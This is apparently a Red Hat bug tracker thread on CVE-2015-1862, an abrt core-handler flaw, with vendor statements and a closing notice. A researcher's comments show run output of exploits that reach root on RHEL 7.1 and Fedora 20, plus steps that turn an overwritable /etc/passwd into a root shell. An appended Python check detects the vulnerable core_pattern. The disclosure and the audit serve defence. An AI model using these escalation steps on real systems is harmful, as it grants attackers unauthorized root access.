A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. Specifically this issue affects those abrt versions in which the following core-handler was used:

HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This commit was added to abrt via (to add support for handling crashes inside containers):
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809

But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:
https://github.com/abrt/abrt/commit/a6cdfd6a16251447264d203e145624a96fa811e3
Public via: http://www.openwall.com/lists/oss-security/2015/04/14/4
It's not obvious to me that abrt in RHEL7 is not affected; are you sure? I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.

[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt
[taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
Didn't win, trying again!
[snip lots of output]
Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)
In case it isn't obvious, you can easily turn this into a root shell like this:

$ getent passwd taviso
taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
$ vi /etc/passwd
$ getent passwd taviso
taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
$ su taviso
Password:
# id
uid=0(root) gid=0(root) groups=0(root)
exit
The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862. It is currently under investigation.
Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug relates to that particular CVE/flaw. As mentioned above, since namespaces/chroot support in abrt does not exist in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:
https://bugzilla.redhat.com/show_bug.cgi?id=1211835
http://www.openwall.com/lists/oss-security/2015/04/14/4

These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7, as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.
Statement: Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7
Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code"; isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
abrt-addon-ccpp-2.2.2-1.fc20.x86_64
$ cat /etc/fedora-release
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
   ^
$ ./test
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
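An added audit check, written for this note and not part of the bug report or of abrt: it parses a kernel.core_pattern value like the one shown in the sysctl output above and flags the handler form this CVE concerns, where the piped hook is chrooted into /proc/%P/root of the crashing process. The sample patterns and the function names are constructed for the example; the specifier list follows the kernel's documented core_pattern format.

```python
import os
import re
import shlex

# Constructed sample values for the check below (not taken from a live host).
# The first is the handler form quoted in this bug; the second is a plain piped
# handler with no chroot; the third writes core files instead of piping them.
VULNERABLE_CORE_PATTERN = ("|/usr/sbin/chroot /proc/%P/root "
                           "/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e")
PLAIN_PIPE_CORE_PATTERN = "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e"
FILE_CORE_PATTERN = "core.%e.%p"

# Format specifiers documented for kernel.core_pattern (%p is the PID as seen
# in the crasher's namespace, %P the global PID, %% a literal percent sign).
KNOWN_SPECIFIERS = set("pPiIugdsthecE%")
CHROOT_INTO_CRASHER = re.compile(r"^/proc/%[pP]/root/?$")

def audit_core_pattern(pattern):
    """Classify a core_pattern string; returns a dict of findings."""
    findings = {"piped": pattern.startswith("|"), "handler": None,
                "chroot_into_crasher": False, "unknown_specifiers": []}
    findings["unknown_specifiers"] = sorted(
        {s for s in re.findall(r"%(.)", pattern) if s not in KNOWN_SPECIFIERS})
    if not findings["piped"]:
        return findings
    argv = shlex.split(pattern[1:])
    if not argv:
        return findings
    findings["handler"] = argv[0]
    # The flaw this bug tracks: the hook runs as root with its root directory
    # taken from /proc/<crasher pid>/root, which the crashing (unprivileged)
    # process controls, so every path the hook resolves is attacker-chosen.
    for i, tok in enumerate(argv[:-1]):
        if os.path.basename(tok) == "chroot" and CHROOT_INTO_CRASHER.match(argv[i + 1]):
            findings["chroot_into_crasher"] = True
            # The real handler is whatever follows the chroot target.
            findings["handler"] = argv[i + 2] if i + 2 < len(argv) else None
    return findings

def audit_live_core_pattern(path="/proc/sys/kernel/core_pattern"):
    """Audit the running kernel's setting; None if the file is unavailable."""
    try:
        with open(path) as fh:
            return audit_core_pattern(fh.read().strip())
    except OSError:
        return None

if __name__ == "__main__":
    for sample in (VULNERABLE_CORE_PATTERN, PLAIN_PIPE_CORE_PATTERN, FILE_CORE_PATTERN):
        print(sample, "->", audit_core_pattern(sample))
    print("live:", audit_live_core_pattern())
```

A host whose live result reports chroot_into_crasher as True is running the handler form this bug describes and should be updated to an abrt build that does not chroot into the crashing process's root.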
Please note: Fedora 20 is now EOL and will not be patched for any flaws. Closing this flaw.